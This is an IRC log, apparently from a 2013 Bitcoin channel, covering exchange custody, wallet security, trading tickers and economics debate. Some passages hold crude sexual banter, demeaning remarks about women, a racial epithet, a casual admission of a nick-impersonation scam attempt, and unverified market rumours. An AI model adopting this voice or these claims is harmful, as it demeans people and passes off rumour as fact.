[-] Apr 25 01:58:09 [HAVELOCK] [VTX] 8 @ 0.40001 = 3.2001 BTC [-] Apr 25 01:58:43 for truff1es and KRS1: even though the transaction seems fast on your side, visa doesn't actually move the money when you swipe the card...that process usually takes place when the business gets the deposit from the bank that used visa or mastercard Apr 25 01:58:47 ic Apr 25 01:58:53 thats true Apr 25 01:58:57 that process can take a lot longer than a day Apr 25 01:59:19 not to put too fine a point on it, but visa and mastercard don't actually deal with money at all Apr 25 01:59:20 so its customer -> your service/network -> bitcoin for the end transaction -> bitcoin Apr 25 01:59:38 they are transaction networks Apr 25 01:59:44 right Apr 25 01:59:50 basically its only bitcoin when you move the money out of their system Apr 25 01:59:52 a "visa card" is not issued by visa...a bank issues it Apr 25 01:59:58 yes Apr 25 01:59:59 a new toy ! http://www.btcoracle.com/ Apr 25 02:00:14 in the same way that if i deposit money in my bank account, they don't store that cash in a box with my name on it Apr 25 02:01:05 that is basically how fractional reserve banking started... Apr 25 02:01:20 and you can do that with bitcoin, if you can convince people to deposit their money into your care Apr 25 02:02:52 complicated stuff itc Apr 25 02:03:19 basically its only bitcoin when you move the money out of their system>> whose system? Apr 25 02:03:33 your mother. Apr 25 02:03:47 mt gox for example Apr 25 02:04:21 the coins you have on mt. gox are technically more like coin certificates... Apr 25 02:04:23 no idea how it works there so im just going with what is said itc Apr 25 02:04:33 yes, i agree Apr 25 02:05:05 [HAVELOCK] [VTX] 5 @ 0.44999979 = 2.25 BTC [+] Apr 25 02:05:07 [HAVELOCK] [VTX] 5 @ 0.4499998 = 2.25 BTC [+] Apr 25 02:05:08 [HAVELOCK] [VTX] 31 @ 0.455 = 14.105 BTC [+] Apr 25 02:05:27 just saying, the fact you don't know the private key to the address you send to (correct me if that is not the case) means that you have given up control over your coins and are trusting them to send them where you want, when you want Apr 25 02:06:25 so it acts like an intermediary Apr 25 02:06:31 yes Apr 25 02:06:50 for trading purposes right Apr 25 02:06:58 simple rule of thumb, if you konw the private key, they are yours, if you don't you are trusting someone to do as you wish in the future Apr 25 02:07:16 blockchain.info is in between Apr 25 02:07:25 truff1es: yes, intermediary Apr 25 02:07:30 they *share* the private key with you Apr 25 02:07:57 and yes, blockchain.info's mywallet's CLAIM (and no reason to doubt this so far) that they do not know your private key Apr 25 02:07:59 private key of other end user? Apr 25 02:08:09 no private key to the address you have with them Apr 25 02:08:24 they encrypt in your browser, not on their server Apr 25 02:08:39 you can check js sauce? Apr 25 02:08:48 not sure...haven't checked Apr 25 02:08:49 they must store in a server somewhere Apr 25 02:09:00 i can sign into blockchain from anywhere Apr 25 02:09:01 they can store the wallet.dat encrypted Apr 25 02:09:02 they send backup by mail Apr 25 02:09:10 and they have no access to it Apr 25 02:09:17 im not getting it, why do that when everyone has wallet.dat's? Apr 25 02:09:49 huh? your wallet.dat file is stored on their server so you can access it from anywhere using a browser Apr 25 02:10:03 ok Apr 25 02:10:05 it is encrypted using a passphrase that only you know Apr 25 02:10:14 so for protection? Apr 25 02:10:30 so, if their system is honest and does what they say it does, they have no ability to send your coins Apr 25 02:11:24 in effect, they are providing the service of access to your wallet.dat file from anywhere, as well as a client software that can craft transactions for you, but they do not have the ability to spend your coins Apr 25 02:11:47 how do they accomplish their mixing service? Apr 25 02:11:57 for a similar system (there are many) look at kim dotcom's MEGA Apr 25 02:12:12 okay thanks for the explainations Apr 25 02:12:18 i think you have to specifically mix the coins, and in that case you are trusting them to send coins where you asked them to be sent Apr 25 02:12:26 they charge a fee for that Apr 25 02:12:50 the mixing service is not the same as their mywallet product Apr 25 02:13:17 isnt the mixing service in their wallets too? Apr 25 02:13:30 i think it's called Shared Send or sumth Apr 25 02:13:30 ...no, i don't think it could be Apr 25 02:13:42 the wallet is not a transaction Apr 25 02:13:56 if you choose to send the coins, you are crafting a transaction Apr 25 02:14:17 the transaction is where you are specifying that you will send THEM the coins, and trust them to forward them where you want them to go Apr 25 02:14:28 uncool Apr 25 02:14:36 well, it has its uses Apr 25 02:14:47 talking about joecool Apr 25 02:14:51 if you need a higher level of guaranteed anonymity, it is a great idea Apr 25 02:14:54 lol Apr 25 02:15:29 but of course you should probably use a nice big round number, or a bunch of 1btc transactions Apr 25 02:15:40 or else it would be simple to see where the coins end up Apr 25 02:15:41 truff1es: oh i was trying to scam on neofutur's nick Apr 25 02:15:51 backquotes are all the rage for scamming atm Apr 25 02:16:10 ok gl Apr 25 02:17:56 i think eventually, there will be the equivalent of "lawyers" for crafting really complicated transactions Apr 25 02:18:01 multisig etc Apr 25 02:18:04 so what i learned today, mt gox is good for easy access to wallets Apr 25 02:18:18 yeah Apr 25 02:18:32 it usually comes down to convenience vs security Apr 25 02:18:51 it is very convenient to use a wallet you dn't control...but if they are hacked your coins are gone Apr 25 02:19:24 but it is really inconvenient to go to a safe deposit box to get a paper wallet you left there, but you will almost certainly not be hacked Apr 25 02:19:25 they being mt gox? Apr 25 02:19:31 whoever you trust Apr 25 02:20:20 id be nervous if i had a lot of digital money these days Apr 25 02:20:26 lots of hacking afoot Apr 25 02:20:35 so that is the tradeoff...how much convenience or security do you need, the best way is to keep large portions in a paper wallet. a little bit on your home computer encrypted, and spending money in an online wallet Apr 25 02:20:45 you do know you could just encrypt your wallet.dat and store offline or online in multiple spots easily Apr 25 02:20:53 joecool: yes Apr 25 02:21:11 but every copy means one more copy that COULD be compromised Apr 25 02:21:21 i guess Apr 25 02:21:28 joecool: i don't have a paper wallet Apr 25 02:21:43 [BTCTC] [GSDPT] 8 @ 0.003333 = 0.0267 BTC [+] Apr 25 02:21:57 [BTCTC] [B.YABMC] 5 @ 0.01629 = 0.0815 BTC [-] Apr 25 02:22:03 u gonna have a baaaad time Apr 25 02:22:14 i am just saying, if i had 11,000 bitcoins...10,500 would be only accessible with a multisig transaction with the horcruxes split up into 7 locations lol Apr 25 02:22:35 seems like a solid thing to do Apr 25 02:22:36 error4733: i don't hold a lot of bitcoins...i have bitcoin denominated assets Apr 25 02:22:50 the biggest loss i had was in that whole bitcoinica debacle Apr 25 02:22:51 check out the winklevii security system Apr 25 02:23:15 pretty much don't put your coin in anything you don't manage if you can't stand to lose it Apr 25 02:23:18 joecool: you got zhou tong'd!? Apr 25 02:23:23 p.much Apr 25 02:23:31 [MPEX] [S.MPOE] 8650 @ 0.00071 = 6.1415 BTC [+] Apr 25 02:23:31 dang Apr 25 02:23:33 he's back by the way Apr 25 02:23:38 mjr_ these? http://www.wallstreetoasis.com/blog/the-winklevii-strike-again-to-corner-the-bitcoin-market Apr 25 02:23:40 just saw him on bitcointalk Apr 25 02:23:44 MJR_: i thought he was in hiding Apr 25 02:23:49 i would be if i were him Apr 25 02:23:52 he's a scammer, and should be labeled as such Apr 25 02:24:10 someone's probably gonna kill him if he shows his face in public Apr 25 02:24:30 sure someone didn't just jack his account? Apr 25 02:24:50 ;;tslb Apr 25 02:24:54 saved them on small flash drives, putting the drives, in turn, in safe deposit boxes at banks in three different cities. Apr 25 02:24:57 Time since last block: 5 minutes and 19 seconds Apr 25 02:25:06 thats what they did with their 11,000 coins Apr 25 02:25:33 ;;goxlag Apr 25 02:25:33 it didn't specify if it was a n of m scheme, but i thought i read that somewhere Apr 25 02:25:33 MtGox lag is 1.059392 seconds. During this time, light travels 0.00212300970646 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 25 02:25:40 MJR_: no encryption? Apr 25 02:25:56 Scrat: didn't specify in this article, but almost guaranteed to be encrypted Apr 25 02:26:05 [BTCTC] [B.YABMC] 18 @ 0.01629 = 0.2932 BTC [-] Apr 25 02:26:23 anyways, i heard from credible sources that zuckerberg already matched them Apr 25 02:26:46 n of m (ssss) with encryption for the ultimate paranoia Apr 25 02:26:52 Scrat: yep Apr 25 02:27:07 it also makes it seem cool, since they are like horcruxes Apr 25 02:27:19 assuming of course that you think harry potter is cool lol Apr 25 02:28:53 imagine what will happen if facebook adds person to person bitcoin payments Apr 25 02:29:12 (which technically noone will give a shit about) Apr 25 02:29:16 but imagine the hype Apr 25 02:29:43 and lol at "credible sources" Apr 25 02:29:59 hello tiberiusiv Apr 25 02:30:17 i ate beans today Apr 25 02:30:21 I've been farting all day Apr 25 02:32:10 well, rumor, but i believe it Apr 25 02:32:25 The market cap is huge... people keep buying Apr 25 02:32:33 the money it would take to buy 11,000 is trivial to zuckerberg...and i'm sure he wouldn't want to be beaten to some new tech thing by them Apr 25 02:33:13 ;;market buy 11000 Apr 25 02:33:15 A market order to buy 11000 bitcoins right now would take 1770138.2261 USD and would take the last price up to 166.0000 USD, resulting in an average price of 160.9217 USD/BTC. | Data vintage: 0.0013 seconds Apr 25 02:33:58 ;;ticker --last Apr 25 02:33:58 154.80000 Apr 25 02:35:47 one thing to keep in mind is the dynamics of it Apr 25 02:35:49 I don't see what we'd do with so much market cap. Not enough transactions backing it. Mostly speculative "storing of value" Apr 25 02:35:57 market buy only tells you the state of the book. Apr 25 02:36:13 Namworld store of value and speculation are strictly distinct. Apr 25 02:36:43 ^^this Apr 25 02:36:53 $avg Apr 25 02:36:55 jurov: 150.44 Apr 25 02:40:42 Considering how well BTC seems to be a good store of value, I think anyone doing a store of value is speculating. Apr 25 02:41:16 They're putting it aside, thinking it will probably keep increasing in value over time due to limited supply. Apr 25 02:47:30 in a very simple sense, the speculator takes a position in the expectation that with the passage of time the price of bitcoin will vary Apr 25 02:47:47 the store of value user takes a position with the expectation that with the passage of time the price of bitcoin will not vary. Apr 25 02:47:51 they are literally antithetical. Apr 25 02:53:43 Yeah, but people seem to be doing both Apr 25 02:54:13 I'm not saying I'm agreeing with what's occuring Apr 25 02:55:32 diamond ? Apr 25 02:57:14 fact is we can conceptualise a money now, not 200 years ago Apr 25 02:58:17 well, it stores value, maybe it doesn't retain it Apr 25 02:59:05 yes, but many asset value change every second Apr 25 03:00:11 coffee, cigarete ? you need something ? Apr 25 03:01:37 + a limited supply Apr 25 03:01:44 ;;ticker Apr 25 03:01:45 BTCUSD ticker | Best bid: 154.89999, Best ask: 154.99000, Bid-ask spread: 0.09001, Last trade: 154.89999, 24 hour volume: 225856.02255002, 24 hour low: 140.96635, 24 hour high: 166.43438, 24 hour vwap: 152.06850 Apr 25 03:02:08 [HAVELOCK] [HIM] 1 @ 1.8439 BTC [+] Apr 25 03:02:58 opinion isnt too subjective either Apr 25 03:03:38 its not possible to create another one just because people want to? Apr 25 03:03:58 [BTCTC] [ASICMINER-PT] 1 @ 1.1749 BTC [+] Apr 25 03:05:35 what if i had an electric car but i like using the other sometimes couldnt be bothered if it ran or not Apr 25 03:06:47 ;;eightball tiberiusiv sold all his coin at 55$ two weeks ago ? Apr 25 03:06:47 One would be wise to think so. Apr 25 03:06:58 heh Apr 25 03:07:34 tiberiusiv is wrong Apr 25 03:07:40 and what did we say tiberiusiv Apr 25 03:07:48 you have no skin in the game so you can't talk Apr 25 03:07:49 the points make sense but i wouldnt call it fact Apr 25 03:07:56 WHY ARE YOU TALKING? Apr 25 03:08:02 You are the broke person. Apr 25 03:08:13 prove it Apr 25 03:08:45 gold is a store of value ? Apr 25 03:08:46 tiberiusiv: if your mom was a store of value there would be a huge market. Apr 25 03:08:48 conclusion doesnt follow Apr 25 03:09:02 gold is a store of value! Apr 25 03:10:28 ok give me for you a good exemple for a store value ? Apr 25 03:11:06 [HAVELOCK] [VTX] 2 @ 0.46 = 0.92 BTC [+] Apr 25 03:11:41 everything is a store of value, it's just that the clock is ticking Apr 25 03:11:57 and orkaa is getting older Apr 25 03:12:35 ok, have fun in your parallel universe Apr 25 03:15:27 so a coupla weeks ago i followed a dozen or so domme bitchez on twitter Apr 25 03:15:40 finally gave up and unfollowed them. man they're boring. Apr 25 03:15:50 domme bitchez? Apr 25 03:15:54 mircea_popescu: haha Apr 25 03:16:41 orkaa ya Apr 25 03:17:34 what's domme? Apr 25 03:18:04 ah, dominatrix stuff Apr 25 03:18:05 dumb Apr 25 03:18:08 lol Apr 25 03:18:09 jkjk Apr 25 03:19:45 it's like... one of the many services women provide. like making sandwiches or dressing up as french maids. Apr 25 03:20:04 i kinda hate domme scene Apr 25 03:20:08 why ? Apr 25 03:20:14 every video gets better and better and better Apr 25 03:20:17 and then it ends Apr 25 03:20:22 they don't ever fuck, fuck Apr 25 03:20:41 well afaik it's mostly for people who don't fuck so well. Apr 25 03:21:33 haha Apr 25 03:25:05 my argument also stands for latex porn Apr 25 03:25:12 they don't fuck Apr 25 03:25:22 or if they do, it's the guy that's getting it Apr 25 03:25:35 reminds me of decafinated coffee Apr 25 03:25:54 why arent you in #bitcoin-troll Apr 25 03:25:56 i've fucked girls in latex Apr 25 03:26:31 most suits have this detachable bottom bit, sorta like kid spielhosen Apr 25 03:27:08 i know, that's why i'm so surprised the hole isn't used so often Apr 25 03:27:25 PayPal President 'Thinking About' Including Bitcoin. Apr 25 03:27:34 lol Apr 25 03:27:57 [BTCTC] [COGNITIVE] 2 @ 0.1981 = 0.3962 BTC [+] Apr 25 03:28:47 only problem with latex is it kinda gets the girl sweating Apr 25 03:29:19 smells good? Apr 25 03:29:32 ThickAsThieves, it wouldn't be a problem then Apr 25 03:30:13 sweat only smells bad after a while Apr 25 03:30:16 much like piss Apr 25 03:30:23 but when she unleashes her spielhosen Apr 25 03:31:24 mircea_popescu, piss pretty much smells bad right away Apr 25 03:31:42 ewww Apr 25 03:31:42 well if you eat aparagus Apr 25 03:31:47 this is where I go play video games Apr 25 03:32:25 Metro 2033 Apr 25 03:32:36 In russia apocalypse find you Apr 25 03:34:46 [BTCTC] [ASICMINER-PT] 5 @ 1.16 = 5.8 BTC [-] Apr 25 03:46:07 [MPEX] [S.MPOE] 9752 @ 0.00070367 = 6.8622 BTC [-] Apr 25 03:46:11 [MPEX] [S.MPOE] 9350 @ 0.00071 = 6.6385 BTC [+] Apr 25 03:48:54 lmao so apparently there's a huge hole in wp super cache, Apr 25 03:49:08 as a comment allows rce Apr 25 03:49:59 just what wp needs, more holes Apr 25 03:50:46 schwpeitzer! Apr 25 03:50:51 [MPEX] [S.MPOE] 3698 @ 0.00071384 = 2.6398 BTC [+] Apr 25 03:57:06 [HAVELOCK] [KCIM] 10 @ 1.33597 = 13.3597 BTC [+] Apr 25 03:57:26 anyone want a chance to win a free Bitcoin ? Apr 25 03:57:29 join http://glados.cc/coinchat/r:loldong Apr 25 03:57:35 i'm good Apr 25 03:58:06 [HAVELOCK] [HIM] 1 @ 1.839 BTC [-] Apr 25 03:59:25 nope Apr 25 03:59:25 not daniel daniel Apr 25 03:59:32 but hi tradefortress Apr 25 03:59:41 i just posted a link to the chat here **** BEGIN LOGGING AT Thu Apr 25 13:07:56 2013 Apr 25 13:08:23 ;;ticker Apr 25 13:08:24 BTCUSD ticker | Best bid: 157.79760, Best ask: 158.48999, Bid-ask spread: 0.69239, Last trade: 158.48999, 24 hour volume: 193543.48962967, 24 hour low: 140.96635, 24 hour high: 166.43438, 24 hour vwap: 154.54250 Apr 25 13:19:39 [MPEX] [S.MPOE] 9800 @ 0.00067919 = 6.6561 BTC [-] Apr 25 13:19:41 [MPEX] [S.MPOE] 2550 @ 0.000678 = 1.7289 BTC [-] Apr 25 13:24:12 There are currently 0 bitcoins offered at or under 0.0 USD, worth 0.0 USD in total. | Data vintage: 0.0043 seconds Apr 25 13:24:12 There are currently 48565537 bitcoins demanded at or over 0.0 USD, worth 20073000.7143 USD in total. | Data vintage: 0.0362 seconds Apr 25 13:24:27 There are currently 44143.255 bitcoins offered at or under 200.0 USD, worth 7922764.29638 USD in total. | Data vintage: 14.9885 seconds Apr 25 13:24:33 There are currently 98491.619 bitcoins offered at or under 500.0 USD, worth 22841799.0416 USD in total. | Data vintage: 21.2126 seconds Apr 25 13:25:37 [MPEX] [S.MPOE] 3256 @ 0.000678 = 2.2076 BTC [-] Apr 25 13:33:04 whats new everyone? Apr 25 13:34:26 There are currently 61938.58 bitcoins demanded at or over 100.0 USD, worth 7823432.35362 USD in total. | Data vintage: 96.2734 seconds Apr 25 13:34:46 [BTCTC] [ASICMINER-PT] 1 @ 1.2989 BTC [-] Apr 25 13:35:15 hi mjr_ , just spotted: http://www.igmarkets.co.uk/cfd/bitcoin-binary-options.html Apr 25 13:35:57 anyone registered on ig? Apr 25 13:36:48 thats pretty cool Apr 25 13:36:58 been there for a while, nobody yet reported using it. Apr 25 13:37:10 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [+] Apr 25 13:37:18 [BTCTC] [BASIC-MINING] 9 @ 0.40001 = 3.6001 BTC [-] Apr 25 13:37:35 [BTCTC] [ASICMINER-PT] 1 @ 1.299 BTC [+] Apr 25 13:38:38 There are currently 161046.23 bitcoins demanded at or over 50.0 USD, worth 14647076.0603 USD in total. | Data vintage: 76.5995 seconds Apr 25 13:39:02 [BTCTC] [ASICMINER-PT] 1 @ 1.309 BTC [+] Apr 25 13:43:32 There are currently 376782.68 bitcoins demanded at or over 10.0 USD, worth 19376072.7346 USD in total. | Data vintage: 55.6013 seconds Apr 25 13:43:41 There are currently 186963.15 bitcoins demanded at or over 40.0 USD, worth 15776400.1157 USD in total. | Data vintage: 65.5900 seconds Apr 25 13:43:49 There are currently 219352.05 bitcoins demanded at or over 30.0 USD, worth 16876229.4503 USD in total. | Data vintage: 72.9214 seconds Apr 25 13:43:53 There are currently 430997.15 bitcoins demanded at or over 5.0 USD, worth 19735047.4708 USD in total. | Data vintage: 77.4950 seconds Apr 25 13:44:23 ;;bids 0 Apr 25 13:44:23 There are currently 48566824 bitcoins demanded at or over 0.0 USD, worth 20170679.2697 USD in total. | Data vintage: 106.8246 seconds Apr 25 13:45:01 mircea_popescu: hey! didn't know you were on, how's it going? Apr 25 13:47:08 theres usually an early morning gathering of 1-n coiners Apr 25 13:47:17 U.S. folk Apr 25 13:47:29 murcans Apr 25 13:48:50 lol cool Apr 25 13:49:04 i got my best bid/ask ticker up and running Apr 25 13:49:29 not sure whether to think this is an ugly hack or an elegant solution (sometimes they can be the same thing?) Apr 25 13:49:30 neat..web? Apr 25 13:49:35 not really Apr 25 13:49:46 i'm using node.js to run a console app Apr 25 13:50:06 i think node.js is the best thing since peanut butter and jelly Apr 25 13:50:16 which i will then spit into my order book, i'm going to basically place an order on the internal book for every order i get from gox Apr 25 13:50:29 just to test the engine etc Apr 25 13:50:33 and get some market data going Apr 25 13:51:16 MJR_: i hope you;ve converted it to a socket pool Apr 25 13:52:01 on a second glance the code i gave you sucks ass :p Apr 25 13:52:03 [HAVELOCK] [SDICE] 1 @ 0.28000003 BTC [-] Apr 25 13:52:39 I got a fish on the line Apr 25 13:52:42 * deego (deego@unaffiliated/deego) has joined #bitcoin-anal Apr 25 13:52:42 KRS1: heh, wth is this channel? :)) Apr 25 13:52:54 Finally, someone to idle in my new chan Apr 25 13:53:32 it is really really basic right now Apr 25 13:53:43 Scrat: the code you gave me was super awesome and got me on the right track Apr 25 13:54:24 KRS1: can you explain the purpose of bitcoin-anal? Apr 25 13:56:00 Yes, in a matter of words, I suppose. Maybe if I explain it to Mircea Popescu he can come up with a more simple way. Apr 25 13:56:17 is it for obsessive compulsive people? fans of bitcoins and anal sex? Apr 25 13:56:28 people who want to pay for anal sex using bitcoins? Apr 25 13:57:03 you should put some header on the site to kinda specify, and maybe throw up a webpage for that chan Apr 25 13:57:13 prepare thy anii Apr 25 13:57:42 ;;eightball what is bitcoin anal for Apr 25 13:57:42 It shall be. Apr 25 13:57:46 ;;eightball what is bitcoin anal for Apr 25 13:57:46 Yes! Apr 25 13:57:52 see :/ Apr 25 13:57:59 KRH1: let's make a bot that will autopost new /dntg stuff to #bitcoin-anal Apr 25 13:58:07 what is dntg? Apr 25 13:58:09 thus giving it a purpose Apr 25 13:58:10 I guess the first rule of #bitcoin-anal is that we don't talk about #bitcoin-anal Apr 25 13:58:17 have i fallen far behind in IRC? Apr 25 13:58:27 i've been pretty busy lately lol Apr 25 13:58:30 http://polimedia.us/dtng/ (nsfw) Apr 25 13:59:07 doh Apr 25 13:59:08 jurov: that might be just what #bitcoin-anal needs Apr 25 13:59:11 romanian /soc/ ? Apr 25 13:59:50 what does dtng stand for? oh...i feel dumb now Apr 25 13:59:52 dating Apr 25 14:01:16 whats new jurov? Apr 25 14:02:37 KRS1: so...using nodejs have you been able to clear the console? Apr 25 14:03:03 i am finding it kinda fun to see how javascripts origins shape nodejs Apr 25 14:03:04 not there yet. it's at hello world etm. Apr 25 14:03:09 *atm Apr 25 14:03:40 i really want to get around to building a site in angularjs. with node.js on the server Apr 25 14:04:07 mjr_ so what new... user asked me to escalate a problem to mpex... that will be inevitably axed :/ Apr 25 14:05:15 a joy, indeed Apr 25 14:06:01 jurov: what problem? Apr 25 14:06:25 i'll maybe publish it after i put everything together Apr 25 14:07:12 MJR_: build something for the sake of building it with angular? Apr 25 14:08:36 i still think it's a hassle unless you're dealing with tons of forms and dynamic data Apr 25 14:15:22 hai! Apr 25 14:15:54 MJR_ http://trilema.com/2013/fire-in-alabama-lets-make-the-most-of-it/ Apr 25 14:15:56 that. Apr 25 14:16:11 MJR: I don't have functional knowledge of node.js..what i have seen of it is very kick ass though. Apr 25 14:16:41 This video is wrong on so many levels, including the random little black girl dancing https://www.youtube.com/watch?feature=player_embedded&v=JWKmEqKaX0w Apr 25 14:19:13 mulatto-in-chief, that's awesome. Apr 25 14:19:28 lol. what's the big deal. Apr 25 14:19:37 There are currently 160463.16 bitcoins demanded at or over 50.0 USD, worth 14545877.0448 USD in total. | Data vintage: 114.7310 seconds Apr 25 14:19:49 There are currently 44710.655 bitcoins offered at or under 200.0 USD, worth 8024939.68883 USD in total. | Data vintage: 0.0034 seconds Apr 25 14:22:58 heh yea they're actually pretty good- south african group Apr 25 14:23:23 KRS1 lol the two girls on the bed... Apr 25 14:23:26 it's their first tiem. Apr 25 14:23:59 i had to watch that video at least 5 times til i caught everything..like when they're sitting down to eat..did you notice the pictures on the wall.. Apr 25 14:24:18 :p Apr 25 14:26:45 nice article Apr 25 14:28:05 another bitcoin-central problem? I missed that Apr 25 14:28:15 besides the hack pizzaman1337? Apr 25 14:28:22 https://bitcoin-central.net/ Apr 25 14:28:29 "We have been compromised, please do not send any funds to your wallet." Apr 25 14:28:36 ovh took out slush and the frenchies. Apr 25 14:28:41 submitted to reddit 15 hours ago Apr 25 14:28:46 ah that still Apr 25 14:28:46 this is your friendly warning, if you're using them move Apr 25 14:28:47 ok Apr 25 14:29:05 yeah...i think OVH should be responsible Apr 25 14:29:09 can they sue? Apr 25 14:29:10 entertaining video Apr 25 14:29:24 how do you handle servers mircea_popescu? do you have your own physical box somewhere? Apr 25 14:29:33 yes. Apr 25 14:29:39 a number of. Apr 25 14:29:49 various locations? any kind of physical security? Apr 25 14:29:54 yes. Apr 25 14:30:13 physical security is not such a big deal, as i was saying yest Apr 25 14:30:18 pretty much any dc offers lockable cages Apr 25 14:30:23 did you see roger ver's received extortion threat? Apr 25 14:30:36 i've not read summaries today yet Apr 25 14:33:56 tbh i'm kinda surprised nobody has taken me on that bet. Apr 25 14:39:31 hmmm Apr 25 14:39:35 check this out Apr 25 14:40:55 http://nashx.com/About Apr 25 14:40:59 interesting idea... Apr 25 14:41:55 but i think you still have to trust the guy running the exchange Apr 25 14:42:07 kakobrekla https://bitcointalk.org/index.php?topic=186945.0 Apr 25 14:42:39 so, betsofcoin w/e scamming, blockbet scamming, i guess bitbet marks a new record of market dominance Apr 25 14:42:45 99% or some shit by now Apr 25 14:43:39 MJR_ seems it could be usable to troll people neh ? Apr 25 14:44:04 yes Apr 25 14:44:07 i agree Apr 25 14:44:13 and bitbet is the best so far Apr 25 14:44:37 i suppose if someone has money and feels like fucking over other people then it is fine Apr 25 14:44:49 but people with a ton of money will always have an advantage over people without Apr 25 14:45:39 i shot the guy a tweet inviting him here Apr 25 14:45:44 maybe he shows up, kinda curious. Apr 25 14:48:35 yeah, i appreciate it from a theoretical perspective Apr 25 14:48:41 you are changing incentives Apr 25 14:48:51 which i am all for...but i think i figured out the problem Apr 25 14:49:05 you don't account for all the incentives on both sides of the equation...hence trolling Apr 25 14:49:17 indeed. Apr 25 14:49:27 trolling is a perfect example of not having a broad enough scope for defining "value" Apr 25 14:49:38 relates to my favorite economic thought experiment Apr 25 14:49:39 but it should be he explaining his project rather than me possibly arguing with a strawman Apr 25 14:50:40 http://en.wikipedia.org/wiki/Ultimatum_game Apr 25 14:51:00 hehehe Apr 25 14:52:30 MJR_ reciprocation is the problem with that. Apr 25 14:52:35 yes Apr 25 14:52:39 they talk about that later on Apr 25 14:52:48 that specific experiment is limited to one round Apr 25 14:52:58 but they have others that ask about multi-rounds Apr 25 14:53:12 and they have done empirical studies to test what this means Apr 25 14:54:07 basically, the offerer can view part of his offer as accrued honor or fairness...which is worth something, the decider can view his role as a fighter of injustice as a value, and it is rare to find a society where an 80/20 split is accepted Apr 25 14:55:02 i find it mind boggling that people view this as "irrational behavior" it is perfectly rational...if you broaden the definition of "value" Apr 25 14:55:13 well that's always the case Apr 25 14:55:26 child rape is probably perfectly rational from the rapist's perspective. Apr 25 14:55:29 for example...almost any woman could prostitute...why don't they all do it (and not just in a metaphorical sense)? Apr 25 14:55:37 because they perceive they can't. Apr 25 14:55:46 those who have that perception corrected for them always do. Apr 25 14:55:59 it should be free money in their eyes...except it isn't...social stigma, laws, etc all change the value proposition Apr 25 14:56:14 meaning it isn't worth it at the prices they assume they would get Apr 25 14:56:28 no such thing as a free lunch...and morals have a dollar value Apr 25 14:56:41 just like anything else Apr 25 14:57:08 how many prostitutes do you know ? Apr 25 14:57:33 personally...i never get their names Apr 25 14:57:40 so we aren't familiar socially Apr 25 14:58:25 truffles: point is just incentives can be used to create fair systems if you account for what variables people are weighing Apr 25 14:59:06 it's quite well established that people don't do math. Apr 25 14:59:18 this coming from the other end, ie, the deterrence effect of criminal punishment. Apr 25 14:59:24 i think the opposite may be true...we all do math subconsciously Apr 25 14:59:36 people don't care WHAT the punishment is. the only thing that makes any difference is that there's SOME punishment. Apr 25 14:59:47 truffles: that misses the point, there is no bad and good, there is only perceived value Apr 25 15:00:30 in that specific example (screwing guy who tries to offer unfair deal)>(sum of money gained from unfair deal) Apr 25 15:01:03 it is a simple equation...you are deciding between two choices, whichever choice is more valuable is the choice you will make Apr 25 15:01:27 in this case, short sighted economists view it as a choice between $0 and $10, but that is not the whole picture Apr 25 15:01:54 it is actually ($0+punishing that guy) vs ($10+feeling cheated) Apr 25 15:01:54 "I can assure you btcrow.com is not into defrauding anyone. We've processed transactions over 500 BTC at a time." Apr 25 15:01:56 this is cute. Apr 25 15:02:21 MJR_> it is actually ($0+punishing that guy) vs ($10+feeling cheated) << good point that. Apr 25 15:02:32 why thank you Apr 25 15:02:49 however, it's hard to quantify. some men pay women to abuse them for instance. Apr 25 15:02:54 a masochist could value the cheating. Apr 25 15:03:08 most people in shitty countries (like the us) are taught not to punish Apr 25 15:03:11 that's also a factor. Apr 25 15:03:25 but truffles also brought up an interesting question...what if it all seems to me to be roughly equal in value? that is where randomness and chance play a role, a role that we have tried to minimize (though people still flip coins from time to time when they can't decide) Apr 25 15:03:49 if i make an offer to you, you can ignore/reject or you can accept Apr 25 15:04:19 you will accept if it seems valuable based on whatever metrics you choose to use, the point is that if you accept, its the rational choice based on your perceived utility/benefit Apr 25 15:04:48 to some people, posting pictures of themselves online with sharpies stuck up their asses was the RATIONAL choice Apr 25 15:05:47 truffles: perhaps Apr 25 15:05:59 point was, if you don't account for "lulz" you will never understand trolling Apr 25 15:06:22 it should not exist...but it does...so wasting your time online making arguments you know to be false is worth your time Apr 25 15:06:40 why would it be worth someones time? they do it for the "lulz" Apr 25 15:07:05 so now that you have a more accurate picture of the value proposition, you can change the incentives to stop trolls Apr 25 15:07:11 i agree Apr 25 15:07:26 just saying without understanding the incentives in a situation, you can't change that situation in a controlled manner Apr 25 15:10:43 except the main property of trolling is that it's immune to attempts at changing the value proposition./ Apr 25 15:11:05 this is in fact the best definituion of trolling, and it's ultimate reservoir : people's indomitable will to dominate their environment Apr 25 15:12:53 mircea_popescu: i've found "ignore" does wonders Apr 25 15:13:12 how much value does someone get in a chan where no one can hear them? Apr 25 15:13:18 exactly 0 Apr 25 15:13:47 the funny thing is that most people do the opposite, they engage the troll Apr 25 15:13:47 not exactly zero. for instance truffles is on my ignore, you keep talking to them, i'm like mmmmkay. Apr 25 15:13:58 mircea_popescu: good point Apr 25 15:14:08 although i did say if everyone ignored them Apr 25 15:14:41 truffles usually trolls mildly enough that i haven't ignored, but for example eskimobob or tiberiusiv Apr 25 15:15:02 they are not around very often...specifically eskimobob Apr 25 15:15:17 because no one will give them what they want, attention Apr 25 15:15:40 hey, anyone want to make a birthday cake ? Apr 25 15:15:48 whose birthday? Apr 25 15:15:55 also, i liked those meme pics Apr 25 15:15:59 we could have it as the community cake so 1 year old services can put it on their site Apr 25 15:16:16 i dunno, maybe it's a dumb idea Apr 25 15:16:26 impossible to make something that'd work in all designs Apr 25 15:19:11 actually kind of cool Apr 25 15:19:17 a 3rd award? Apr 25 15:24:00 zomg Apr 25 15:24:01 https://bitcointalk.org/index.php?topic=186998.0 Apr 25 15:24:15 lol... Apr 25 15:24:49 looks like they still want to do LTC Apr 25 15:24:53 price is going up Apr 25 15:24:54 ltc Apr 25 15:25:00 since teh news Apr 25 15:25:02 for you to say that they are "unworthy of my attention" is kinda silly since i have been nothing but actively talking to you Apr 25 15:25:27 the fact i haven't ignored you, and i don't really plan to, says that i listen to your questions Apr 25 15:25:37 and typically respond Apr 25 15:26:07 point is there is disagreeing, where their motive is to discuss, and there is trolling where their motive is to get an emotional reaction... Apr 25 15:27:04 fair enough Apr 25 15:27:06 in what sense? Apr 25 15:27:16 true Apr 25 15:27:44 and if i think they are it isn't worth my time...tiberius is a perfect example, he will recycle arguments, switch to ad hominem, it is very easy 